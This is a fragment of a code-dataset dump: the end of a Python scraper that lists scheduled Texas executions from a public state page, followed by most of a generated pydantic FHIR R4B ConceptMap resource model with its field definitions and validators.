info_in_td[index].text\n \n offender_list = []\n\n for info in scheduled_executions_info:\n offender = Offender_info()\n offender.scheduled_execution = info[0]\n offender.time_to_scheduled_execution = calculate_time_to_execution_date(info[0])\n offender.last_name = info[2]\n offender.first_name = info[3]\n offender.TDCJ_number = info[4]\n offender.date_of_birth = info[5]\n offender.race = info[6]\n offender.date_received = info[7]\n offender.county = info[8]\n offender.link_to_detailed_info = info[1]\n offender_list.append(offender)\n\n return offender_list\n\ndef calculate_time_to_execution_date(date):\n # Time to next execution calculation\n #print(\"date is: \",date)\n next_execution = list(map(int, date.split(\"/\")))\n return datetime(next_execution[2], next_execution[0], next_execution[1]) - datetime.now()\n \nif __name__ == '__main__':\n\n url = \"https://www.tdcj.state.tx.us/death_row/dr_scheduled_executions.html\"\n executions_info = get_scheduled_executions_info(url)\n for i in range(len(executions_info)):\n print(\"Information for offender number {}\".format(i+1))\n print(executions_info[i])\n\n","sub_path":"death_penalty.py","file_name":"death_penalty.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"84704243","text":"# -*- coding: utf-8 -*-\n\"\"\"\nProfile: http://hl7.org/fhir/StructureDefinition/ConceptMap\nRelease: R4B\nVersion: 4.3.0\nBuild ID: c475c22\nLast updated: 2022-05-28T12:47:40.239+10:00\n\"\"\"\nimport typing\n\nfrom pydantic import Field, root_validator\nfrom pydantic.error_wrappers import ErrorWrapper, ValidationError\nfrom pydantic.errors import MissingError, NoneIsNotAllowedError\n\nfrom . import backboneelement, domainresource, fhirtypes\n\n\nclass ConceptMap(domainresource.DomainResource):\n \"\"\"Disclaimer: Any field name ends with ``__ext`` doesn't part of\n Resource StructureDefinition, instead used to enable Extensibility feature\n for FHIR Primitive Data Types.\n\n A map from one set of concepts to one or more other concepts.\n A statement of relationships from one set of concepts to one or more other\n concepts - either concepts in code systems, or data element/data element\n concepts, or classes in class models.\n \"\"\"\n\n resource_type = Field(\"ConceptMap\", const=True)\n\n contact: typing.List[fhirtypes.ContactDetailType] = Field(\n None,\n alias=\"contact\",\n title=\"Contact details for the publisher\",\n description=(\n \"Contact details to assist a user in finding and communicating with the\"\n \" publisher.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n copyright: fhirtypes.Markdown = Field(\n None,\n alias=\"copyright\",\n title=\"Use and/or publishing restrictions\",\n description=(\n \"A copyright statement relating to the concept map and/or its contents.\"\n \" Copyright statements are generally legal restrictions on the use and \"\n \"publishing of the concept map.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n copyright__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_copyright\", title=\"Extension field for ``copyright``.\"\n )\n\n date: fhirtypes.DateTime = Field(\n None,\n alias=\"date\",\n title=\"Date last changed\",\n description=(\n \"The date (and optionally time) when the concept map was published. \"\n \"The date must change when the business version changes and it must \"\n \"change if the status code changes. In addition, it should change when \"\n \"the substantive content of the concept map changes.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n date__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_date\", title=\"Extension field for ``date``.\"\n )\n\n description: fhirtypes.Markdown = Field(\n None,\n alias=\"description\",\n title=\"Natural language description of the concept map\",\n description=(\n \"A free text natural language description of the concept map from a \"\n \"consumer's perspective.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_description\", title=\"Extension field for ``description``.\"\n )\n\n experimental: bool = Field(\n None,\n alias=\"experimental\",\n title=\"For testing purposes, not real usage\",\n description=(\n \"A Boolean value to indicate that this concept map is authored for \"\n \"testing purposes (or education/evaluation/marketing) and is not \"\n \"intended to be used for genuine usage.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n experimental__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_experimental\", title=\"Extension field for ``experimental``.\"\n )\n\n group: typing.List[fhirtypes.ConceptMapGroupType] = Field(\n None,\n alias=\"group\",\n title=\"Same source and target systems\",\n description=\"A group of mappings that all have the same source and target system.\",\n # if property is element of this resource.\n element_property=True,\n )\n\n identifier: fhirtypes.IdentifierType = Field(\n None,\n alias=\"identifier\",\n title=\"Additional identifier for the concept map\",\n description=(\n \"A formal identifier that is used to identify this concept map when it \"\n \"is represented in other formats, or referenced in a specification, \"\n \"model, design or an instance.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n jurisdiction: typing.List[fhirtypes.CodeableConceptType] = Field(\n None,\n alias=\"jurisdiction\",\n title=\"Intended jurisdiction for concept map (if applicable)\",\n description=(\n \"A legal or geographic region in which the concept map is intended to \"\n \"be used.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n name: fhirtypes.String = Field(\n None,\n alias=\"name\",\n title=\"Name for this concept map (computer friendly)\",\n description=(\n \"A natural language name identifying the concept map. This name should \"\n \"be usable as an identifier for the module by machine processing \"\n \"applications such as code generation.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_name\", title=\"Extension field for ``name``.\"\n )\n\n publisher: fhirtypes.String = Field(\n None,\n alias=\"publisher\",\n title=\"Name of the publisher (organization or individual)\",\n description=(\n \"The name of the organization or individual that published the concept \"\n \"map.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n publisher__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_publisher\", title=\"Extension field for ``publisher``.\"\n )\n\n purpose: fhirtypes.Markdown = Field(\n None,\n alias=\"purpose\",\n title=\"Why this concept map is defined\",\n description=(\n \"Explanation of why this concept map is needed and why it has been \"\n \"designed as it has.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n purpose__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_purpose\", title=\"Extension field for ``purpose``.\"\n )\n\n sourceCanonical: fhirtypes.Canonical = Field(\n None,\n alias=\"sourceCanonical\",\n title=\"The source value set that contains the concepts that are being mapped\",\n description=(\n \"Identifier for the source value set that contains the concepts that \"\n \"are being mapped and provides context for the mappings.\"\n ),\n # if property is element of this resource.\n element_property=True,\n # Choice of Data Types. i.e source[x]\n one_of_many=\"source\",\n one_of_many_required=False,\n # note: Listed Resource Type(s) should be allowed as Reference.\n enum_reference_types=[\"ValueSet\"],\n )\n sourceCanonical__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_sourceCanonical\", title=\"Extension field for ``sourceCanonical``.\"\n )\n\n sourceUri: fhirtypes.Uri = Field(\n None,\n alias=\"sourceUri\",\n title=\"The source value set that contains the concepts that are being mapped\",\n description=(\n \"Identifier for the source value set that contains the concepts that \"\n \"are being mapped and provides context for the mappings.\"\n ),\n # if property is element of this resource.\n element_property=True,\n # Choice of Data Types. i.e source[x]\n one_of_many=\"source\",\n one_of_many_required=False,\n )\n sourceUri__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_sourceUri\", title=\"Extension field for ``sourceUri``.\"\n )\n\n status: fhirtypes.Code = Field(\n None,\n alias=\"status\",\n title=\"draft | active | retired | unknown\",\n description=(\n \"The status of this concept map. Enables tracking the life-cycle of the\"\n \" content.\"\n ),\n # if property is element of this resource.\n element_property=True,\n element_required=True,\n # note: Enum values can be used in validation,\n # but use in your own responsibilities, read official FHIR documentation.\n enum_values=[\"draft\", \"active\", \"retired\", \"unknown\"],\n )\n status__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_status\", title=\"Extension field for ``status``.\"\n )\n\n targetCanonical: fhirtypes.Canonical = Field(\n None,\n alias=\"targetCanonical\",\n title=\"The target value set which provides context for the mappings\",\n description=(\n \"The target value set provides context for the mappings. Note that the \"\n \"mapping is made between concepts, not between value sets, but the \"\n \"value set provides important context about how the concept mapping \"\n \"choices are made.\"\n ),\n # if property is element of this resource.\n element_property=True,\n # Choice of Data Types. i.e target[x]\n one_of_many=\"target\",\n one_of_many_required=False,\n # note: Listed Resource Type(s) should be allowed as Reference.\n enum_reference_types=[\"ValueSet\"],\n )\n targetCanonical__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_targetCanonical\", title=\"Extension field for ``targetCanonical``.\"\n )\n\n targetUri: fhirtypes.Uri = Field(\n None,\n alias=\"targetUri\",\n title=\"The target value set which provides context for the mappings\",\n description=(\n \"The target value set provides context for the mappings. Note that the \"\n \"mapping is made between concepts, not between value sets, but the \"\n \"value set provides important context about how the concept mapping \"\n \"choices are made.\"\n ),\n # if property is element of this resource.\n element_property=True,\n # Choice of Data Types. i.e target[x]\n one_of_many=\"target\",\n one_of_many_required=False,\n )\n targetUri__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_targetUri\", title=\"Extension field for ``targetUri``.\"\n )\n\n title: fhirtypes.String = Field(\n None,\n alias=\"title\",\n title=\"Name for this concept map (human friendly)\",\n description=\"A short, descriptive, user-friendly title for the concept map.\",\n # if property is element of this resource.\n element_property=True,\n )\n title__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_title\", title=\"Extension field for ``title``.\"\n )\n\n url: fhirtypes.Uri = Field(\n None,\n alias=\"url\",\n title=(\n \"Canonical identifier for this concept map, represented as a URI \"\n \"(globally unique)\"\n ),\n description=(\n \"An absolute URI that is used to identify this concept map when it is \"\n \"referenced in a specification, model, design or an instance; also \"\n \"called its canonical identifier. This SHOULD be globally unique and \"\n \"SHOULD be a literal address at which at which an authoritative \"\n \"instance of this concept map is (or will be) published. This URL can \"\n \"be the target of a canonical reference. It SHALL remain the same when \"\n \"the concept map is stored on different servers.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n url__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_url\", title=\"Extension field for ``url``.\"\n )\n\n useContext: typing.List[fhirtypes.UsageContextType] = Field(\n None,\n alias=\"useContext\",\n title=\"The context that the content is intended to support\",\n description=(\n \"The content was developed with a focus and intent of supporting the \"\n \"contexts that are listed. These contexts may be general categories \"\n \"(gender, age, ...) or may be references to specific programs \"\n \"(insurance plans, studies, ...) and may be used to assist with \"\n \"indexing and searching for appropriate concept map instances.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n version: fhirtypes.String = Field(\n None,\n alias=\"version\",\n title=\"Business version of the concept map\",\n description=(\n \"The identifier that is used to identify this version of the concept \"\n \"map when it is referenced in a specification, model, design or \"\n \"instance. This is an arbitrary value managed by the concept map author\"\n \" and is not expected to be globally unique. For example, it might be a\"\n \" timestamp (e.g. yyyymmdd) if a managed version is not available. \"\n \"There is also no expectation that versions can be placed in a \"\n \"lexicographical sequence.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n version__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_version\", title=\"Extension field for ``version``.\"\n )\n\n @classmethod\n def elements_sequence(cls):\n \"\"\"returning all elements names from\n ``ConceptMap`` according specification,\n with preserving original sequence order.\n \"\"\"\n return [\n \"id\",\n \"meta\",\n \"implicitRules\",\n \"language\",\n \"text\",\n \"contained\",\n \"extension\",\n \"modifierExtension\",\n \"url\",\n \"identifier\",\n \"version\",\n \"name\",\n \"title\",\n \"status\",\n \"experimental\",\n \"date\",\n \"publisher\",\n \"contact\",\n \"description\",\n \"useContext\",\n \"jurisdiction\",\n \"purpose\",\n \"copyright\",\n \"sourceUri\",\n \"sourceCanonical\",\n \"targetUri\",\n \"targetCanonical\",\n \"group\",\n ]\n\n @root_validator(pre=True, allow_reuse=True)\n def validate_required_primitive_elements_1181(\n cls, values: typing.Dict[str, typing.Any]\n ) -> typing.Dict[str, typing.Any]:\n \"\"\"https://www.hl7.org/fhir/extensibility.html#Special-Case\n In some cases, implementers might find that they do not have appropriate data for\n an element with minimum cardinality = 1. In this case, the element must be present,\n but unless the resource or a profile on it has made the actual value of the primitive\n data type mandatory, it is possible to provide an extension that explains why\n the primitive value is not present.\n \"\"\"\n required_fields = [(\"status\", \"status__ext\")]\n _missing = object()\n\n def _fallback():\n return \"\"\n\n errors: typing.List[\"ErrorWrapper\"] = []\n for name, ext in required_fields:\n field = cls.__fields__[name]\n ext_field = cls.__fields__[ext]\n value = values.get(field.alias, _missing)\n if value not in (_missing, None):\n continue\n ext_value = values.get(ext_field.alias, _missing)\n missing_ext = True\n if ext_value not in (_missing, None):\n if isinstance(ext_value, dict):\n missing_ext = len(ext_value.get(\"extension\", [])) == 0\n elif (\n getattr(ext_value.__class__, \"get_resource_type\", _fallback)()\n == \"FHIRPrimitiveExtension\"\n ):\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n else:\n validate_pass = True\n for validator in ext_field.type_.__get_validators__():\n try:\n ext_value = validator(v=ext_value)\n except ValidationError as exc:\n errors.append(ErrorWrapper(exc, loc=ext_field.alias))\n validate_pass = False\n if not validate_pass:\n continue\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n if missing_ext:\n if value is _missing:\n errors.append(ErrorWrapper(MissingError(), loc=field.alias))\n else:\n errors.append(\n ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)\n )\n if len(errors) > 0:\n raise ValidationError(errors, cls) # type: ignore\n\n return values\n\n @root_validator(pre=True, allow_reuse=True)\n def validate_one_of_many_1181(\n cls, values: typing.Dict[str, typing.Any]\n ) -> typing.Dict[str, typing.Any]:\n \"\"\"https://www.hl7.org/fhir/formats.html#choice\n A few elements have a choice of more than one data type for their content.\n All such elements have a name that takes the form nnn[x].\n The \"nnn\" part of the name is constant, and the \"[x]\" is replaced with\n the title-cased name of the type that is actually used.\n The table view shows each of these names explicitly.\n\n Elements that have a choice of data type cannot repeat - they must have a\n maximum cardinality of 1. When constructing an instance of an element with a\n choice of types, the authoring system must create a single element with a\n data type chosen from among the list of permitted data types.\n \"\"\"\n one_of_many_fields = {\n \"source\": [\"sourceCanonical\", \"sourceUri\"],\n \"target\": [\"targetCanonical\", \"targetUri\"],\n }\n for prefix, fields in one_of_many_fields.items():\n assert cls.__fields__[fields[0]].field_info.extra[\"one_of_many\"] == prefix\n required = (\n cls.__fields__[fields[0]].field_info.extra[\"one_of_many_required\"]\n is True\n )\n found = False\n for field in fields:\n if field in values and values[field] is not None:\n if found is True:\n raise ValueError(\n \"Any of one field value is expected from \"\n f\"this list {fields}, but got multiple!\"\n )\n else:\n found = True\n if required is True and found is False:\n raise ValueError(f\"Expect any of field value from this list {fields}.\")\n\n return values\n\n\nclass ConceptMapGroup(backboneelement.BackboneElement):\n \"\"\"Disclaimer: Any field name ends with ``__ext`` doesn't part of\n Resource StructureDefinition, instead used to enable Extensibility feature\n for FHIR Primitive Data Types.\n\n Same source and target systems.\n A group of mappings that all have the same source and target system.\n \"\"\"\n\n resource_type = Field(\"ConceptMapGroup\", const=True)\n\n element: typing.List[fhirtypes.ConceptMapGroupElementType] = Field(\n ...,\n alias=\"element\",\n title=\"Mappings for a concept from the source set\",\n description=(\n \"Mappings for an individual concept in the source to one or more \"\n \"concepts in the target.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n source: fhirtypes.Uri = Field(\n None,\n alias=\"source\",\n title=\"Source system where concepts to be mapped are defined\",\n description=(\n \"An absolute URI that identifies the source system where the concepts \"\n \"to be mapped are defined.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n source__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_source\", title=\"Extension field for ``source``.\"\n )\n\n sourceVersion: fhirtypes.String = Field(\n None,\n alias=\"sourceVersion\",\n title=\"Specific version of the code system\",\n description=(\n \"The specific version of the code system, as determined by the code \"\n \"system authority.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n sourceVersion__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_sourceVersion\", title=\"Extension field for ``sourceVersion``.\"\n )\n\n target: fhirtypes.Uri = Field(\n None,\n alias=\"target\",\n title=\"Target system that the concepts are to be mapped to\",\n description=(\n \"An absolute URI that identifies the target system that the concepts \"\n \"will be mapped to.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n target__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_target\", title=\"Extension field for ``target``.\"\n )\n\n targetVersion: fhirtypes.String = Field(\n None,\n alias=\"targetVersion\",\n title=\"Specific version of the code system\",\n description=(\n \"The specific version of the code system, as determined by the code \"\n \"system authority.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n targetVersion__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_targetVersion\", title=\"Extension field for ``targetVersion``.\"\n )\n\n unmapped: fhirtypes.ConceptMapGroupUnmappedType = Field(\n None,\n alias=\"unmapped\",\n title=\"What to do when there is no mapping for the source concept\",\n description=(\n 'What to do when there is no mapping for the source concept. \"Unmapped\"'\n \" does not include codes that are unmatched, and the unmapped element \"\n \"is ignored in a code is specified to have equivalence = unmatched.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n @classmethod\n def elements_sequence(cls):\n \"\"\"returning all elements names from\n ``ConceptMapGroup`` according specification,\n with preserving original sequence order.\n \"\"\"\n return [\n \"id\",\n \"extension\",\n \"modifierExtension\",\n \"source\",\n \"sourceVersion\",\n \"target\",\n \"targetVersion\",\n \"element\",\n \"unmapped\",\n ]\n\n\nclass ConceptMapGroupElement(backboneelement.BackboneElement):\n \"\"\"Disclaimer: Any field name ends with ``__ext`` doesn't part of\n Resource StructureDefinition, instead used to enable Extensibility feature\n for FHIR Primitive Data Types.\n\n Mappings for a concept from the source set.\n Mappings for an individual concept in the source to one or more concepts in\n the target.\n \"\"\"\n\n resource_type = Field(\"ConceptMapGroupElement\", const=True)\n\n code: fhirtypes.Code = Field(\n None,\n alias=\"code\",\n title=\"Identifies element being mapped\",\n description=\"Identity (code or path) or the element/item being mapped.\",\n # if property is element of this resource.\n element_property=True,\n )\n code__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_code\", title=\"Extension field for ``code``.\"\n )\n\n display: fhirtypes.String = Field(\n None,\n alias=\"display\",\n title=\"Display for the code\",\n description=(\n \"The display for the code. The display is only provided to help editors\"\n \" when editing the concept map.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n display__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_display\", title=\"Extension field for ``display``.\"\n )\n\n target: typing.List[fhirtypes.ConceptMapGroupElementTargetType] = Field(\n None,\n alias=\"target\",\n title=\"Concept in target system for element\",\n description=\"A concept from the target value set that this concept maps to.\",\n # if property is element of this resource.\n element_property=True,\n )\n\n @classmethod\n def elements_sequence(cls):\n \"\"\"returning all elements names from\n ``ConceptMapGroupElement`` according specification,\n with preserving original sequence order.\n \"\"\"\n return [\"id\", \"extension\", \"modifierExtension\", \"code\", \"display\", \"target\"]\n\n\nclass ConceptMapGroupElementTarget(backboneelement.BackboneElement):\n \"\"\"Disclaimer: Any field name ends with ``__ext`` doesn't part of\n Resource StructureDefinition, instead used to enable Extensibility feature\n for FHIR Primitive Data Types.\n\n Concept in target system for element.\n A concept from the target value set that this concept maps to.\n \"\"\"\n\n resource_type = Field(\"ConceptMapGroupElementTarget\", const=True)\n\n code: fhirtypes.Code = Field(\n None,\n alias=\"code\",\n title=\"Code that identifies the target element\",\n description=\"Identity (code or path) or the element/item that the map refers to.\",\n # if property is element of this resource.\n element_property=True,\n )\n code__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_code\", title=\"Extension field for ``code``.\"\n )\n\n comment: fhirtypes.String = Field(\n None,\n alias=\"comment\",\n title=\"Description of status/issues in mapping\",\n description=(\n \"A description of status/issues in mapping that conveys additional \"\n \"information not represented in the structured data.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n comment__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_comment\", title=\"Extension field for ``comment``.\"\n )\n\n dependsOn: typing.List[fhirtypes.ConceptMapGroupElementTargetDependsOnType] = Field(\n None,\n alias=\"dependsOn\",\n title=\"Other elements required for this mapping (from context)\",\n description=(\n \"A set of additional dependencies for this mapping to hold. This \"\n \"mapping is only applicable if the specified element can be resolved, \"\n \"and it has the specified value.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n display: fhirtypes.String = Field(\n None,\n alias=\"display\",\n title=\"Display for the code\",\n description=(\n \"The display for the code. The display is only provided to help editors\"\n \" when editing the concept map.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n display__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_display\", title=\"Extension field for ``display``.\"\n )\n\n equivalence: fhirtypes.Code = Field(\n None,\n alias=\"equivalence\",\n title=(\n \"relatedto | equivalent | equal | wider | subsumes | narrower | \"\n \"specializes | inexact | unmatched | disjoint\"\n ),\n description=(\n \"The equivalence between the source and target concepts (counting for \"\n \"the dependencies and products). The equivalence is read from target to\"\n \" source (e.g. the target is 'wider' than the source).\"\n ),\n # if property is element of this resource.\n element_property=True,\n element_required=True,\n # note: Enum values can be used in validation,\n # but use in your own responsibilities, read official FHIR documentation.\n enum_values=[\n \"relatedto\",\n \"equivalent\",\n \"equal\",\n \"wider\",\n \"subsumes\",\n \"narrower\",\n \"specializes\",\n \"inexact\",\n \"unmatched\",\n \"disjoint\",\n ],\n )\n equivalence__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_equivalence\", title=\"Extension field for ``equivalence``.\"\n )\n\n product: typing.List[fhirtypes.ConceptMapGroupElementTargetDependsOnType] = Field(\n None,\n alias=\"product\",\n title=\"Other concepts that this mapping also produces\",\n description=(\n \"A set of additional outcomes from this mapping to other elements. To \"\n \"properly execute this mapping, the specified element must be mapped to\"\n \" some data element or source that is in context. The mapping may still\"\n \" be useful without a place for the additional data elements, but the \"\n \"equivalence cannot be relied on.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n\n @classmethod\n def elements_sequence(cls):\n \"\"\"returning all elements names from\n ``ConceptMapGroupElementTarget`` according specification,\n with preserving original sequence order.\n \"\"\"\n return [\n \"id\",\n \"extension\",\n \"modifierExtension\",\n \"code\",\n \"display\",\n \"equivalence\",\n \"comment\",\n \"dependsOn\",\n \"product\",\n ]\n\n @root_validator(pre=True, allow_reuse=True)\n def validate_required_primitive_elements_3039(\n cls, values: typing.Dict[str, typing.Any]\n ) -> typing.Dict[str, typing.Any]:\n \"\"\"https://www.hl7.org/fhir/extensibility.html#Special-Case\n In some cases, implementers might find that they do not have appropriate data for\n an element with minimum cardinality = 1. In this case, the element must be present,\n but unless the resource or a profile on it has made the actual value of the primitive\n data type mandatory, it is possible to provide an extension that explains why\n the primitive value is not present.\n \"\"\"\n required_fields = [(\"equivalence\", \"equivalence__ext\")]\n _missing = object()\n\n def _fallback():\n return \"\"\n\n errors: typing.List[\"ErrorWrapper\"] = []\n for name, ext in required_fields:\n field = cls.__fields__[name]\n ext_field = cls.__fields__[ext]\n value = values.get(field.alias, _missing)\n if value not in (_missing, None):\n continue\n ext_value = values.get(ext_field.alias, _missing)\n missing_ext = True\n if ext_value not in (_missing, None):\n if isinstance(ext_value, dict):\n missing_ext = len(ext_value.get(\"extension\", [])) == 0\n elif (\n getattr(ext_value.__class__, \"get_resource_type\", _fallback)()\n == \"FHIRPrimitiveExtension\"\n ):\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n else:\n validate_pass = True\n for validator in ext_field.type_.__get_validators__():\n try:\n ext_value = validator(v=ext_value)\n except ValidationError as exc:\n errors.append(ErrorWrapper(exc, loc=ext_field.alias))\n validate_pass = False\n if not validate_pass:\n continue\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n if missing_ext:\n if value is _missing:\n errors.append(ErrorWrapper(MissingError(), loc=field.alias))\n else:\n errors.append(\n ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)\n )\n if len(errors) > 0:\n raise ValidationError(errors, cls) # type: ignore\n\n return values\n\n\nclass ConceptMapGroupElementTargetDependsOn(backboneelement.BackboneElement):\n \"\"\"Disclaimer: Any field name ends with ``__ext`` doesn't part of\n Resource StructureDefinition, instead used to enable Extensibility feature\n for FHIR Primitive Data Types.\n\n Other elements required for this mapping (from context).\n A set of additional dependencies for this mapping to hold. This mapping is\n only applicable if the specified element can be resolved, and it has the\n specified value.\n \"\"\"\n\n resource_type = Field(\"ConceptMapGroupElementTargetDependsOn\", const=True)\n\n display: fhirtypes.String = Field(\n None,\n alias=\"display\",\n title=\"Display for the code (if value is a code)\",\n description=(\n \"The display for the code. The display is only provided to help editors\"\n \" when editing the concept map.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n display__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_display\", title=\"Extension field for ``display``.\"\n )\n\n property: fhirtypes.Uri = Field(\n None,\n alias=\"property\",\n title=\"Reference to property mapping depends on\",\n description=(\n \"A reference to an element that holds a coded value that corresponds to\"\n \" a code system property. The idea is that the information model \"\n \"carries an element somewhere that is labeled to correspond with a code\"\n \" system property.\"\n ),\n # if property is element of this resource.\n element_property=True,\n element_required=True,\n )\n property__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_property\", title=\"Extension field for ``property``.\"\n )\n\n system: fhirtypes.Canonical = Field(\n None,\n alias=\"system\",\n title=\"Code System (if necessary)\",\n description=(\n \"An absolute URI that identifies the code system of the dependency code\"\n \" (if the source/dependency is a value set that crosses code systems).\"\n ),\n # if property is element of this resource.\n element_property=True,\n # note: Listed Resource Type(s) should be allowed as Reference.\n enum_reference_types=[\"CodeSystem\"],\n )\n system__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_system\", title=\"Extension field for ``system``.\"\n )\n\n value: fhirtypes.String = Field(\n None,\n alias=\"value\",\n title=\"Value of the referenced element\",\n description=(\n \"Identity (code or path) or the element/item/ValueSet/text that the map\"\n \" depends on / refers to.\"\n ),\n # if property is element of this resource.\n element_property=True,\n element_required=True,\n )\n value__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_value\", title=\"Extension field for ``value``.\"\n )\n\n @classmethod\n def elements_sequence(cls):\n \"\"\"returning all elements names from\n ``ConceptMapGroupElementTargetDependsOn`` according specification,\n with preserving original sequence order.\n \"\"\"\n return [\n \"id\",\n \"extension\",\n \"modifierExtension\",\n \"property\",\n \"system\",\n \"value\",\n \"display\",\n ]\n\n @root_validator(pre=True, allow_reuse=True)\n def validate_required_primitive_elements_3929(\n cls, values: typing.Dict[str, typing.Any]\n ) -> typing.Dict[str, typing.Any]:\n \"\"\"https://www.hl7.org/fhir/extensibility.html#Special-Case\n In some cases, implementers might find that they do not have appropriate data for\n an element with minimum cardinality = 1. In this case, the element must be present,\n but unless the resource or a profile on it has made the actual value of the primitive\n data type mandatory, it is possible to provide an extension that explains why\n the primitive value is not present.\n \"\"\"\n required_fields = [(\"property\", \"property__ext\"), (\"value\", \"value__ext\")]\n _missing = object()\n\n def _fallback():\n return \"\"\n\n errors: typing.List[\"ErrorWrapper\"] = []\n for name, ext in required_fields:\n field = cls.__fields__[name]\n ext_field = cls.__fields__[ext]\n value = values.get(field.alias, _missing)\n if value not in (_missing, None):\n continue\n ext_value = values.get(ext_field.alias, _missing)\n missing_ext = True\n if ext_value not in (_missing, None):\n if isinstance(ext_value, dict):\n missing_ext = len(ext_value.get(\"extension\", [])) == 0\n elif (\n getattr(ext_value.__class__, \"get_resource_type\", _fallback)()\n == \"FHIRPrimitiveExtension\"\n ):\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n else:\n validate_pass = True\n for validator in ext_field.type_.__get_validators__():\n try:\n ext_value = validator(v=ext_value)\n except ValidationError as exc:\n errors.append(ErrorWrapper(exc, loc=ext_field.alias))\n validate_pass = False\n if not validate_pass:\n continue\n if ext_value.extension and len(ext_value.extension) > 0:\n missing_ext = False\n if missing_ext:\n if value is _missing:\n errors.append(ErrorWrapper(MissingError(), loc=field.alias))\n else:\n errors.append(\n ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)\n )\n if len(errors) > 0:\n raise ValidationError(errors, cls) # type: ignore\n\n return values\n\n\nclass ConceptMapGroupUnmapped(backboneelement.BackboneElement):\n \"\"\"Disclaimer: Any field name ends with ``__ext`` doesn't part of\n Resource StructureDefinition, instead used to enable Extensibility feature\n for FHIR Primitive Data Types.\n\n What to do when there is no mapping for the source concept.\n What to do when there is no mapping for the source concept. \"Unmapped\" does\n not include codes that are unmatched, and the unmapped element is ignored\n in a code is specified to have equivalence = unmatched.\n \"\"\"\n\n resource_type = Field(\"ConceptMapGroupUnmapped\", const=True)\n\n code: fhirtypes.Code = Field(\n None,\n alias=\"code\",\n title=\"Fixed code when mode = fixed\",\n description=(\n \"The fixed code to use when the mode = 'fixed' - all unmapped codes \"\n \"are mapped to a single fixed code.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n code__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_code\", title=\"Extension field for ``code``.\"\n )\n\n display: fhirtypes.String = Field(\n None,\n alias=\"display\",\n title=\"Display for the code\",\n description=(\n \"The display for the code. The display is only provided to help editors\"\n \" when editing the concept map.\"\n ),\n # if property is element of this resource.\n element_property=True,\n )\n display__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(\n None, alias=\"_display\", title=\"Extension field for ``display``.\"\n )\n\n mode: fhirtypes.Code = Field(\n None,\n alias=\"mode\",\n title=\"provided | fixed | other-map\",\n 